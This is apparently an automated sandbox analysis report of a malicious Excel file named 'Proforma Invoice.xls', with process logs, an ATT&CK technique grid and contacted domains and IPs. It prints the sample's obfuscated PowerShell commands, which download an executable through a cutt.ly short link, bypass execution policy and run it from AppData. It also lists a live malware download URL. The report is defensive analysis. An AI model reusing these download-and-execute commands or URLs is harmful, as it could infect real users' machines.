Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2456 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000009.00000002.2152606374.0000000000317000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (3 occurrences)

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (15 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation (3 occurrences)

Mitre Att&ck Matrix

The matrix below is the report's technique grid rebuilt as pipe-separated rows; the number after a technique name is the count shown beside it in the report, and an empty cell means the report lists no technique in that position.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter 11 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 22 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

The behavior graph is an image in the original report; the information recoverable from it is listed here as a process tree.

Behavior Graph ID: 320373
Sample: Proforma Invoice.xls
Startdate: 19/11/2020
Architecture: WINDOWS
Score: 88
Signatures on the sample: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 5 other signatures

  • EXCEL.EXE started (graph counters: 85, 28); signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit)
    • cmd.exe started; signature: Obfuscated command line found
      • powershell.exe started (graph counters: 16, 9); DNS/IP: cutt.ly 104.22.1.232, 443, 49167 CLOUDFLARENETUS United States; shopphongtinh.com 202.92.6.10, 443, 49169, 49170 VNPT-AS-VNVNPTCorpVN Viet Nam
    • cmd.exe started
      • powershell.exe started (graph counter: 7)
    • cmd.exe started
      • powershell.exe started (graph counter: 7)

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Proforma Invoice.xls | 14% | Virustotal |
Proforma Invoice.xls | 21% | ReversingLabs | Document-Word.Downloader.Powdow

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
cutt.ly | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label | Link
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation | safe | -
http://www.a-cert.at0E | 0% | Avira URL Cloud | safe | -
http://www.certplus.com/CRL/class3.crl0 | 0% | URL Reputation | safe | -
http://www.e-me.lv/repository0 | 0% | URL Reputation | safe | -
http://www.acabogacia.org/doc0 | 0% | URL Reputation | safe | -
http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe | -
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | Avira URL Cloud | safe | -
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | 0% | Avira URL Cloud | safe | -
http://www.certifikat.dk/repository0 | 0% | Avira URL Cloud | safe | -
http://www.chambersign.org1 | 0% | URL Reputation | safe | -
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe | -
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe | -
http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation | safe | -
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | 0% | Avira URL Cloud | safe | -
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | 0% | URL Reputation | safe | -
http://ca.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe | -
http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation | safe | -
http://ctldl.windows | 0% | Avira URL Cloud | safe | -
http://repository.infonotary.com/cps/qcps.html0$ | 0% | Avira URL Cloud | safe | -
http://www.post.trust.ie/reposit/cps.html0 | 0% | Avira URL Cloud | safe | -
http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation | safe | -
http://www.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe | -
https://cutt.ly/ZhqUH1OPE | 0% | Avira URL Cloud | safe | -
http://ocsp.infonotary.com/responder.cgi0V | 0% | Avira URL Cloud | safe | -
http://www.sk.ee/cps/0 | 0% | URL Reputation | safe | -
http://www.certicamara.com0 | 0% | Avira URL Cloud | safe | -
http://www.globaltrust.info0= | 0% | Avira URL Cloud | safe | -
https://cutt.ly/ZhqUH1O | 0% | Avira URL Cloud | safe | -
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | 0% | Avira URL Cloud | safe | -
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe | -
http://www.ssc.lt/cps03 | 0% | URL Reputation | safe | -
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | 0% | Avira URL Cloud | safe | -
http://ocsp.pki.gva.es0 | 0% | URL Reputation | safe | -
http://crl.oces.certifikat.dk/oces.crl0 | 0% | Avira URL Cloud | safe | -
http://crl.ssc.lt/root-b/cacrl.crl0 | 0% | URL Reputation | safe | -
http://www.dnie.es/dpc0 | 0% | URL Reputation | safe | -
http://www.rootca.or.kr/rca/cps.html0 | 0% | Avira URL Cloud | safe | -
http://www.trustcenter.de/guidelines0 | 0% | Avira URL Cloud | safe | -
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | 0% | Avira URL Cloud | safe | -
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe | -
http://www.globaltrust.info0 | 0% | URL Reputation | safe | -
http://www.certplus.com/CRL/class3TS.crl0 | 0% | URL Reputation | safe | -
https://www.catcert.net/verarrel | 0% | URL Reputation | safe | -
http://www.disig.sk/ca0f | 0% | URL Reputation | safe | -
https://shopphongtinh.comp | 0% | Avira URL Cloud | safe | -
http://www.sk.ee/juur/crl/0 | 0% | URL Reputation | safe | -
http://crl.chambersign.org/chambersignroot.crl0 | 0% | URL Reputation | safe | -
http://crl.xrampsecurity.com/XGCA.crl0 | 0% | URL Reputation | safe | -

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cutt.ly | 104.22.1.232 | true | true | - | unknown
shopphongtinh.com | 202.92.6.10 | true | false | - | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.a-cert.at0E | powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.certplus.com/CRL/class3.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-me.lv/repository0 | powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.acabogacia.org/doc0 | powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersroot.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0 | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | false | - | high
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.certifikat.dk/repository0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chambersign.org1 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pkioverheid.nl/policies/root-policy0 | powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://repository.swisssign.com/0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | - | high
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0 | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class3P.crl0 | powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ctldl.windows | powershell.exe, 00000007.00000002.2127591509.000000001D1CD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://repository.infonotary.com/cps/qcps.html0$ | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.post.trust.ie/reposit/cps.html0 | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.certplus.com/CRL/class2.crl0 | powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.disig.sk/ca/crl/ca_disig.crl0 | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://cutt.ly/ZhqUH1OPE | powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.infonotary.com/responder.cgi0V | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sk.ee/cps/0 | powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com0 | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.globaltrust.info0= | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://cutt.ly/ZhqUH1O | powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://servername/isapibackend.dll | powershell.exe, 00000007.00000002.2127649611.000000001D2F0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.ssc.lt/cps03 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.windows.com/pctv. | powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | false | - | high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.pki.gva.es0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.oces.certifikat.dk/oces.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ssc.lt/root-b/cacrl.crl0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/dpc/0Z | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | false | - | high
http://crl.pki.wellsfargo.com/wsprca.crl0 | powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmp | false | - | high
http://www.dnie.es/dpc0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.rootca.or.kr/rca/cps.html0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.trustcenter.de/guidelines0 | powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.globaltrust.info0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://certificates.starfieldtech.com/repository/1604 | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | false | - | high
http://www.certplus.com/CRL/class3TS.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.entrust.net/CRL/Client1.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | - | high
http://www.entrust.net/CRL/net1.crl0 | powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmp | false | - | high
https://www.catcert.net/verarrel | powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.disig.sk/ca0f | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000009.00000002.2152554964.00000000002CE000.00000004.00000020.sdmp | false | - | high
http://www.e-szigno.hu/RootCA.crl | powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | false | - | high
http://www.signatur.rtr.at/current.crl0 | powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | false | - | high
https://shopphongtinh.comp | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sk.ee/juur/crl/0 | powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersignroot.crl0 | powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.xrampsecurity.com/XGCA.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.quovadis.bm0 | powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ssc.lt/root-a/cacrl.crl0 | powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0 | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.firmaprofesional.com0 | powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://cutt.ly/ | powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://www.netlock.net/docs | powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://shopphongtinh.com | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | false | - | high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0 | powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | false | - | high
http://cps.chambersign.org/cps/publicnotaryroot.html0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e-trust.be/CPS/QNcerts | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/certicamaraca.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | false | - | high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0 | powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.chambersign.org/cps/chambersroot.html0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.acabogacia.org0 | powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://cutt.ly | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://www.litespeedtech.com | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | false | - | high
https://ca.sia.it/seccli/repository/CPS0 | powershell.exe, 00000007.00000002.2125152617.000000001B800000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.securetrust.com/SGCA.crl0 | powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://shopphongtinh.com/Ubnccbruoun7.exe | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://crl.securetrust.com/STCA.crl0 | powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/certicamaraca.crl0; | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | - | high
http://www.e-szigno.hu/RootCA.crt0 | powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | false | - | high
http://www.quovadisglobal.com/cps0 | powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | false | - | high
http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L | powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | false | - | high
http://investor.msn.com/ | powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | false | - | high
http://www.valicert.com/1 | powershell.exe, 00000007.00000003.2112206947.00000000003AE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e-szigno.hu/SZSZ/0 | powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | false | - | high
http://www.%s.comPA | powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0 | powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net0D | powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
202.92.6.10 | unknown | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | false
104.22.1.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 320373
Start date: 19.11.2020
Start time: 10:12:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 31s
